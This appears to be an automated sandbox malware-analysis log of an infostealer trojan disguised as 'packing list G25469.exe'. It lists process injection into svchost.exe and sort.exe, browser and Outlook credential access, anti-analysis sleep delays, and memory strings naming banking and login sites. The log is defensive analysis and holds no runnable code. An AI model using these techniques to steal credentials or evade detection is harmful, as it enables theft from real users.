                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 102 times
                Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 02CB7E54 appears 99 times
                Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 02CDEA12 appears 86 times
                Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 02C5B970 appears 274 times
                Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 02CEF290 appears 105 times
                Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 02CA5130 appears 37 times
                Source: packing list G25469.exe, 00000000.00000003.2099466856.0000000003ADD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs packing list G25469.exe
                Source: packing list G25469.exe, 00000000.00000003.2103417254.0000000003933000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs packing list G25469.exe
                Source: packing list G25469.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@6/4
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7CE7A GetLastError,FormatMessageW,0_2_00B7CE7A
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6AB84 AdjustTokenPrivileges,CloseHandle,0_2_00B6AB84
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B6B134
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B7E1FD
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B76532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00B76532
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B8C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00B8C18C
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B3406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B3406B
                Source: C:\Users\user\Desktop\packing list G25469.exeFile created: C:\Users\user\AppData\Local\Temp\autB244.tmpJump to behavior
                Source: packing list G25469.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sort.exe, 00000005.00000003.2720470532.0000000000624000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000002.3341193924.0000000000624000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2720470532.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000002.3341193924.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2718516167.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2718450676.0000000000604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: packing list G25469.exeReversingLabs: Detection: 76%
                Source: unknownProcess created: C:\Users\user\Desktop\packing list G25469.exe "C:\Users\user\Desktop\packing list G25469.exe"
                Source: C:\Users\user\Desktop\packing list G25469.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\packing list G25469.exe"
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeProcess created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"
                Source: C:\Windows\SysWOW64\sort.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\packing list G25469.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\packing list G25469.exe"Jump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeProcess created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sort.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\sort.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: packing list G25469.exeStatic file information: File size 1220096 > 1048576
                Source: packing list G25469.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: packing list G25469.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: packing list G25469.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: packing list G25469.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: packing list G25469.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: packing list G25469.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: packing list G25469.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: sort.pdb source: svchost.exe, 00000002.00000003.2495787704.0000000003213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2529708363.0000000003200000.00000004.00000020.00020000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000004.00000002.3341601587.0000000001478000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RUaXGIhjtGYK.exe, 00000004.00000002.3340899209.00000000007FE000.00000002.00000001.01000000.00000005.sdmp, RUaXGIhjtGYK.exe, 00000007.00000002.3340901611.00000000007FE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: packing list G25469.exe, 00000000.00000003.2098142445.0000000003810000.00000004.00001000.00020000.00000000.sdmp, packing list G25469.exe, 00000000.00000003.2104866958.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2530579448.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427068611.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2530579448.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2429239626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000002.3342626870.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2531172334.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000002.3342626870.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2533169764.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: packing list G25469.exe, 00000000.00000003.2098142445.0000000003810000.00000004.00001000.00020000.00000000.sdmp, packing list G25469.exe, 00000000.00000003.2104866958.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2530579448.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427068611.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2530579448.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2429239626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sort.exe, sort.exe, 00000005.00000002.3342626870.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2531172334.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000002.3342626870.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2533169764.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: sort.exe, 00000005.00000002.3343142267.000000000325C000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 00000005.00000002.3341193924.000000000056D000.00000004.00000020.00020000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000007.00000000.2602904501.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2825868068.00000000234EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sort.pdbGCTL source: svchost.exe, 00000002.00000003.2495787704.0000000003213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2529708363.0000000003200000.00000004.00000020.00020000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000004.00000002.3341601587.0000000001478000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: sort.exe, 00000005.00000002.3343142267.000000000325C000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 00000005.00000002.3341193924.000000000056D000.00000004.00000020.00020000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000007.00000000.2602904501.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2825868068.00000000234EC000.00000004.80000000.00040000.00000000.sdmp
                Source: packing list G25469.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: packing list G25469.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: packing list G25469.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: packing list G25469.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: packing list G25469.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4E01E LoadLibraryA,GetProcAddress,0_2_00B4E01E
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B56B05 push ecx; ret 0_2_00B56B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041906A push ebp; iretd 2_2_00419085
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004148F0 push ecx; iretd 2_2_004148F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414172 push ebx; retf 2_2_004141B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004121DA push edi; retf 2_2_004121DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403250 push eax; ret 2_2_00403252
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00427A23 push edi; iretd 2_2_00427A2F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F2C6 push ebp; retf 2_2_0041F326
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F2FC push ebp; retf 2_2_0041F326
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418AA3 push esp; retf 2_2_00418ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F2AA push ebp; retf 2_2_0041F326
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408316 push edi; iretd 2_2_00408317
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F333 push ebp; retf 2_2_0041F326
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013F0 push ds; ret 2_2_00401631
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408559 pushad ; ret 2_2_0040855A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408513 pushad ; iretd 2_2_0040852B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015C4 push ds; ret 2_2_00401631
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015F7 push ds; ret 2_2_00401631
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015AA push ds; ret 2_2_00401631
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041167F push ecx; iretd 2_2_00411682
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042362A push edi; iretd 2_2_0042363E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00423633 push edi; iretd 2_2_0042363E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F7B push eax; ret 2_2_00417F7D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FE0 pushad ; ret 2_2_00401FE2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C3225F pushad ; ret 5_2_02C327F9
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C327FA pushad ; ret 5_2_02C327F9
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B98111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B98111
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B4EB42
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B5123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B5123A
                Source: C:\Users\user\Desktop\packing list G25469.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\packing list G25469.exeAPI/Special instruction interceptor: Address: 134A9C4
                Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\sort.exeWindow / User API: threadDelayed 3891Jump to behavior
                Source: C:\Windows\SysWOW64\sort.exeWindow / User API: threadDelayed 6082Jump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeEvaded block: after key decisiongraph_0-96304
                Source: C:\Users\user\Desktop\packing list G25469.exeEvaded block: after key decisiongraph_0-95366
                Source: C:\Users\user\Desktop\packing list G25469.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\sort.exeAPI coverage: 2.8 %
                Source: C:\Windows\SysWOW64\sort.exe TID: 4140Thread sleep count: 3891 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sort.exe TID: 4140Thread sleep time: -7782000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sort.exe TID: 4140Thread sleep count: 6082 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sort.exe TID: 4140Thread sleep time: -12164000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sort.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B76CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B76CA9
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00B760DD
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00B763F9
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B7EB60
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B7F5FA
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7F56F FindFirstFileW,FindClose,0_2_00B7F56F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B81B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B81B2F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B81C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B81C8A
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B81F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B81F94
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_0041C550 FindFirstFileW,FindNextFileW,FindClose,5_2_0041C550
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B4DDC0
                Source: tCJ05791.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: tCJ05791.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: tCJ05791.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: tCJ05791.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: tCJ05791.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: sort.exe, 00000005.00000002.3344843157.0000000007558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
                Source: tCJ05791.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: tCJ05791.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: tCJ05791.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: tCJ05791.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: sort.exe, 00000005.00000002.3344843157.0000000007558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: server_card_metadataoutlook.office.comVMware20,
                Source: tCJ05791.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: tCJ05791.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: tCJ05791.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: tCJ05791.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: tCJ05791.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: tCJ05791.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: tCJ05791.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: tCJ05791.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: tCJ05791.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: tCJ05791.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: tCJ05791.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: tCJ05791.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RUaXGIhjtGYK.exe, 00000007.00000002.3341878823.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: tCJ05791.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: tCJ05791.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: tCJ05791.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: tCJ05791.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: tCJ05791.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: tCJ05791.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: tCJ05791.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: sort.exe, 00000005.00000002.3341193924.000000000056D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
